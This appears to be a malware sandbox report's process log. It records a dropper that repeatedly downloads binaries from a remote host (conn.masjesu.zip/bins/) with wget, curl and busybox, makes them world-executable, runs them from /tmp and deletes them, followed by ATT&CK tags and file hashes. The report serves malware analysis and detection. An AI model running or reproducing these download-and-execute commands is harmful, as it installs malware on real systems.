/usr/bin/wgetwget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:947
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:982
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1003
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1006
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97